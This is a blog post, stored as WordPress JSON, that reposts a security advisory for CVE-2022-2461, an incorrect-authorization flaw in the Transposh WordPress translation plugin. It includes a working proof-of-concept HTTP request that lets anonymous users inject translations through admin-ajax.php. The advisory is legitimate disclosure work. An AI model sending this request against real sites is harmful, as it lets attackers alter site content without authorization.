{"id":28580,"date":"2022-07-29T20:41:35","date_gmt":"2022-07-29T16:41:35","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167870\/wptransposh107-auth.txt"},"modified":"2022-07-30T09:54:31","modified_gmt":"2022-07-30T05:24:31","slug":"transposh-wordpress-translation-1-0-7-incorrect-authorization","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/transposh-wordpress-translation-1-0-7-incorrect-authorization\/","title":{"rendered":"Transposh WordPress Translation 1.0.7 Incorrect Authorization"},"content":{"rendered":"<p dir=\"ltr\">RCE Security Advisory<br \/>\nhttps:\/\/www.rcesecurity.com<\/p>\n<p dir=\"ltr\">1. ADVISORY INFORMATION<br \/>\n=======================<br \/>\nProduct: Transposh WordPress Translation<br \/>\nVendor URL: https:\/\/wordpress.org\/plugins\/transposh-translation-filter-for-wordpress\/<br \/>\nType: Incorrect Authorization [CWE-863]<br \/>\nDate found: 2022-07-13<br \/>\nDate published: 2022-07-22<br \/>\nCVSSv3 Score: 7.5 (CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:H\/A:N)<br \/>\nCVE: CVE-2022-2461<\/p>\n<p dir=\"ltr\">2. CREDITS<br \/>\n==========<br \/>\nThis vulnerability was discovered and researched by Julien Ahrens from<br \/>\nRCE Security.<\/p>\n<p dir=\"ltr\">3. VERSIONS AFFECTED<br \/>\n====================<br \/>\nTransposh WordPress Translation 1.0.8.1 and below<\/p>\n<p dir=\"ltr\">4. INTRODUCTION<br \/>\n===============<br \/>\nTransposh translation filter for WordPress offers a unique approach to blog<br \/>\ntranslation. It allows your blog to combine automatic translation with human<br \/>\ntranslation aided by your users with an easy to use in-context interface.<\/p>\n<p dir=\"ltr\">(from the vendor&#8217;s homepage)<\/p>\n<p dir=\"ltr\">5. 
VULNERABILITY DETAILS<br \/>\n========================<br \/>\nWhen installed, Transposh comes with a set of pre-configured options. One of these<br \/>\nis the &#8220;Who can translate&#8221; setting under the &#8220;Settings&#8221; tab, which by default<br \/>\nallows &#8220;Anonymous&#8221; users to add translations via the plugin&#8217;s &#8220;tp_translation&#8221;<br \/>\najax action.<\/p>\n<p dir=\"ltr\">Successful exploits can allow an unauthenticated attacker to add translations to<br \/>\nthe WordPress site and thereby influence what is actually shown on the site.<\/p>\n<p dir=\"ltr\">6. PROOF OF CONCEPT<br \/>\n===================<br \/>\nThe following Proof-of-Concept adds a new translation:<\/p>\n<p dir=\"ltr\">POST \/wp-admin\/admin-ajax.php HTTP\/2<br \/>\nHost: [host]<br \/>\nContent-Length: 75<br \/>\nCache-Control: max-age=0<br \/>\nUpgrade-Insecure-Requests: 1<br \/>\nContent-Type: application\/x-www-form-urlencoded<br \/>\nUser-Agent: Mozilla\/5.0<\/p>\n<p dir=\"ltr\">action=tp_translation&amp;ln0=en&amp;sr0=rcesecurity.com&amp;items=1&amp;tk0=rcesecurity.com&amp;tr0=rcesecurity.com<\/p>\n<p dir=\"ltr\">7. SOLUTION<br \/>\n===========<br \/>\nNone. Remove the plugin to prevent exploitation.<\/p>\n<p dir=\"ltr\">8. REPORT TIMELINE<br \/>\n==================<br \/>\n2022-07-13: Discovery of the vulnerability<br \/>\n2022-07-13: CVE requested from WPScan (CNA)<br \/>\n2022-07-18: No response from WPScan<br \/>\n2022-07-18: CVE requested from Wordfence (CNA) instead<br \/>\n2022-07-18: Sent note to vendor<br \/>\n2022-07-18: Wordfence assigns CVE-2022-2461<br \/>\n2022-07-20: Since there are currently no plans to provide fixes at all:<br \/>\n2022-07-22: Public disclosure<\/p>\n<p dir=\"ltr\">9. 
REFERENCES<br \/>\n=============<br \/>\nhttps:\/\/github.com\/MrTuxracer\/advisories<br \/>\nhttps:\/\/www.rcesecurity.com\/2022\/07\/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS\/<\/p>\n","protected":false},"excerpt":{"rendered":"<p>RCE Security Advisory https:\/\/www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Transposh WordPress Translation Vendor URL: https:\/\/wordpress.org\/plugins\/transposh-translation-filter-for-wordpress\/ Type: Incorrect Authorization [CWE-863] Date found: 2022-07-13 Date published: 2022-07-22 CVSSv3 Score: 7.5 (CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:H\/A:N) CVE: CVE-2022-2461 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Transposh WordPress Translation 1.0.8.1 and &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28580","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28580","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28580"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28580\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28580"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/bl
og\/wp-json\/wp\/v2\/categories?post=28580"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28580"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}